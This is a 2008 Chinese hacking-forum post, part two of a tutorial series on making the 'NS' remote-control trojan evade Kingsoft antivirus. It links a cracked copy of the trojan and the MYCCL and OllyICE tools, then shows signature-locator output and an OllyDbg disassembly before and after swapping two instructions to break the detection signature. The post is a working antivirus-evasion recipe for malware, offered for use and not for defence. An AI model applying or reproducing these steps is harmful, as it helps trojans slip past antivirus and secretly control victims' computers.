|
|
楼主 |
发表于 2008-7-14 09:25:52
|
显示全部楼层
|阅读模式
来自 河南省商丘市
作者:Ksmoke
教程名:NS远控从零开始之二
QQ:695****0809
论坛UID:13***79
--------------------------------
本教程分4部
第一部这部主要讲如何使NS上线
第二部主要讲免杀过金山
第三部讲免杀过瑞星(一)
第四部讲免杀过瑞星(二)
黑狼注册地址:http://www.nb5.cn/?u=13179
工具下载地址
NS远控破解版:http://www.nb5.cn/read-htm-tid-5075-fpage-4.html
MYccl: http://www.nb5.cn/read-htm-tid-5765-keyword-myccl.html
OllyICE:http://www.nb5.cn/read-htm-tid-1575-keyword-OllyICE.html
点睛偏移:
---------------------------------------------------------
MYCCL定位结果
特征码 物理地址/物理长度 如下:
[特征] 00***50A_000****0003
特征码分布示意图:
[--------------------------------------------------]
[--------------------------------------------------]
[--------------------------------------------------]
[-------------M------------------------------------]
[--------------------------------------------------]
--------------------------------------------------------
点睛偏移转换:45EF0A
--------------------------------------------------------
OD载入特征区域
--------------------------------------------------------
0045EF00 8088 44***30C 5>or byte ptr [eax+C03***44], 54
0045EF07 49 dec ecx
0045EF08 64:49 dec ecx
0045EF0A 50 push eax
0045EF0B 56 push esi
0045EF0C 65:72 73 jb short 0045EF82
0045EF0F 696F 6E 01***00>imul ebp, dword ptr [edi+6E], 1
0045EF16 0001 add byte ptr [ecx], al
0045EF18 0000 add byte ptr [eax], al
0045EF1A 007C88 44 add byte ptr [eax+ecx*4+44], bh
--------------------------------------------------------
OD修改后
--------------------------------------------------------
0045EF00 8088 44***30C 5>or byte ptr [eax+C03***44], 54
0045EF07 49 dec ecx
0045EF08 64:49 dec ecx
0045EF0A 56 push esi
0045EF0B 50 push eax
0045EF0C 65:72 73 jb short 0045EF82
0045EF0F 696F 6E 01***00>imul ebp, dword ptr [edi+6E], 1
0045EF16 0001 add byte ptr [ecx], al
0045EF18 0000 add byte ptr [eax], al
0045EF1A 007C88 44 add byte ptr [eax+ecx*4+44], bh
---------------------------------------------------------
黑狼注册地址:http://www.nb5.cn/?u=13179
第三部讲免杀过瑞星(一)
|
|
发表于 2008-8-13 23:57:26
